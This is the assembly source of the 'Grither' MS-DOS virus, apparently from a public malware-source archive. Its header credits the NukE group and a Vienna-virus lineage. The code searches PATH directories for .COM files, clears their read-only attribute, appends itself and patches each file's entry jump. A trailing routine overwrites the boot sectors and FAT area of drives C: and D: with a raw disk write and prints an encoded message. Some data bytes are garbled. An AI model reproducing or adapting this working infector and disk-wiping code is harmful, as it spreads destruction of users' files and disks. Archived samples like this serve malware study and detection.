MalwareSourceCode/MSDOS/G-Index/Virus.MSDOS.Unknown.grither.asm

330 lines
7.5 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
;**************************************************************************
;** GRITHER VIRUS **
;** Created: 27 Oct 1990 **
;** [NukE] Notes: Does come from the Vienna Virus! And copies itself on **
;** *.COMs and will re-write the begining sectors of drive **
;** C: & D:! Erasing the FATs area... **
;** **
;** Sources Brought to you by -> Rock Steady [NukE]s Head Programmer! **
;** **
;**************************************************************************
data_1e equ 2Ch ; (65AC:002C=0)
data_2e equ 75h ; (65AC:0075=0)
data_3e equ 79h ; (65AC:0079=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
grither proc far
start:
;* jmp short loc_1 ;*(0112)
db 0EBh, 10h
db 90h
data_5 db '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Q<EFBFBD>', 9, 3, '<27><><EFBFBD><EFBFBD><EFBFBD>' ; Data table (indexed access)
db 0Ah, 0
db 0BFh, 0, 1, 0B9h, 3, 0
db 0F3h, 0A4h, 8Bh, 0F2h, 0B4h, 30h
db 0CDh, 21h, 3Ch, 0, 75h, 3
db 0E9h, 0C5h, 1
loc_2:
push es
mov ah,2Fh ; '/'
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
mov [si+0],bx
nop ;*Fixup for MASM (M)
mov [si+2],es
nop ;*Fixup for MASM (M)
pop es
mov dx,5Fh
nop
add dx,si
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
push es
push si
mov es,ds:data_1e ; (65AC:002C=0)
mov di,0
loc_3:
pop si
push si
add si,1Ah
nop ;*Fixup for MASM (M)
lodsb ; String [si] to al
mov cx,8000h
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
mov cx,4
locloop_4:
lodsb ; String [si] to al
scasb ; Scan es:[di] for al
jnz loc_3 ; Jump if not zero
loop locloop_4 ; Loop if cx > 0
pop si
pop es
mov [si+16h],di
nop ;*Fixup for MASM (M)
mov di,si
nop
add di,1Fh
nop ;*Fixup for MASM (M)
mov bx,si
add si,1Fh
nop ;*Fixup for MASM (M)
mov di,si
jmp short loc_10 ; (01B9)
loc_5:
cmp word ptr [si+16h],0
nop ;*Fixup for MASM (M)
jne loc_6 ; Jump if not equal
jmp loc_19 ; (02E9)
loc_6:
push ds
push si
mov ds,es:data_1e ; (65AC:002C=0)
mov di,si
mov si,es:[di+16h]
nop ;*Fixup for MASM (M)
add di,1Fh
nop ;*Fixup for MASM (M)
loc_7:
lodsb ; String [si] to al
cmp al,3Bh ; ';'
je loc_9 ; Jump if equal
cmp al,0
je loc_8 ; Jump if equal
stosb ; Store al to es:[di]
jmp short loc_7 ; (019B)
loc_8:
mov si,0
loc_9:
pop bx
pop ds
mov [bx+16h],si
nop ;*Fixup for MASM (M)
nop
cmp ch,5Ch ; '\'
je loc_10 ; Jump if equal
mov al,5Ch ; '\'
stosb ; Store al to es:[di]
loc_10:
mov [bx+18h],di
nop ;*Fixup for MASM (M)
mov si,bx
add si,10h
nop ;*Fixup for MASM (M)
mov cx,6
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov si,bx
mov ah,4Eh ; 'N'
mov dx,1Fh
nop
add dx,si
mov cx,3
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jmp short loc_12 ; (01DD)
loc_11:
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
loc_12:
jnc loc_13 ; Jump if carry=0
jmp short loc_5 ; (017F)
loc_13:
mov ax,ds:data_2e[si] ; (65AC:0075=0)
and al,1Fh
cmp al,1Fh
je loc_11 ; Jump if equal
cmp word ptr ds:data_3e[si],0FA00h ; (65AC:0079=0)
ja loc_11 ; Jump if above
cmp word ptr ds:data_3e[si],0Ah ; (65AC:0079=0)
jb loc_11 ; Jump if below
mov di,[si+18h]
nop ;*Fixup for MASM (M)
push si
add si,7Dh
nop ;*Fixup for MASM (M)
loc_14:
lodsb ; String [si] to al
stosb ; Store al to es:[di]
cmp al,0
jne loc_14 ; Jump if not equal
pop si
mov ax,4300h
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov [si+8],cx
nop ;*Fixup for MASM (M)
mov ax,4301h
and cx,0FFFEh
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ax,3D02h
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jnc loc_15 ; Jump if carry=0
jmp loc_18 ; (02DA)
loc_15:
mov bx,ax
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov [si+4],cx
nop ;*Fixup for MASM (M)
mov [si+6],dx
nop ;*Fixup for MASM (M)
mov ah,2Ch ; ','
int 21h ; DOS Services ah=function 2Ch
; get time, cx=hrs/min, dh=sec
and dh,7
jnz loc_16 ; Jump if not zero
mov ah,40h ; '@'
mov cx,85h
mov dx,si
add dx,8Ah
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jmp short loc_17 ; (02C3)
db 90h
loc_16:
mov ah,3Fh ; '?'
mov cx,3
mov dx,0Ah
nop
add dx,si
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
jc loc_17 ; Jump if carry Set
cmp ax,3
jne loc_17 ; Jump if not equal
mov ax,4202h
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
jc loc_17 ; Jump if carry Set
mov cx,ax
sub ax,3
mov [si+0Eh],ax
nop ;*Fixup for MASM (M)
add cx,2F7h
mov di,si
sub di,1F5h
mov [di],cx
mov ah,40h ; '@'
mov cx,306h
mov dx,si
sub dx,1F7h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jc loc_17 ; Jump if carry Set
cmp ax,306h
jne loc_17 ; Jump if not equal
mov ax,4200h
mov cx,0
mov dx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
jc loc_17 ; Jump if carry Set
mov ah,40h ; '@'
mov cx,3
mov dx,si
add dx,0Dh
nop ;*Fixup for MASM (M)
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
loc_17:
mov dx,[si+6]
nop ;*Fixup for MASM (M)
mov cx,[si+4]
nop ;*Fixup for MASM (M)
and cx,0FFE0h
or cx,1Fh
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_18:
mov ax,4301h
mov cx,[si+8]
nop ;*Fixup for MASM (M)
mov dx,1Fh
nop
add dx,si
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
loc_19:
push ds
mov ah,1Ah
mov dx,[si+0]
nop ;*Fixup for MASM (M)
mov ds,[si+2]
nop ;*Fixup for MASM (M)
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
pop ds
loc_20:
pop cx
xor ax,ax ; Zero register
xor bx,bx ; Zero register
xor dx,dx ; Zero register
xor si,si ; Zero register
mov di,100h
push di
xor di,di ; Zero register
retn 0FFFFh
db 10 dup (0)
db 0CDh, 20h, 90h, 0E9h, 0, 0
db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
db 0, 0, 0, 0, 50h, 41h
db 54h, 48h, 3Dh, 0, 0
db 105 dup (0)
db 0EBh, 58h, 90h
db ' `7O `88@99@6r `65@85M%AACC%YMJ%'
db 'LWNYMJW%AACC% `:@86@95r `68@87MH'
db 'tzwyjx~%tk%Jqj}nts `5r$'
db '3'
db 0C0h, 8Eh, 0D8h, 0B0h, 2, 0B9h
db 0A0h, 0, 33h, 0D2h, 0BBh, 0
db 0, 0CDh, 26h, 0BBh, 0, 0
loc_21:
cmp byte ptr data_5[bx],24h ; (65AC:0103=90h) '$'
je loc_22 ; Jump if equal
sub byte ptr data_5[bx],5 ; (65AC:0103=90h)
inc bx
jmp short loc_21 ; (0400)
loc_22:
mov dx,offset data_5 ; (65AC:0103=90h)
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
int 20h ; Program Terminate
grither endp
seg_a ends
end start
2021-01-12 23:44:11 +00:00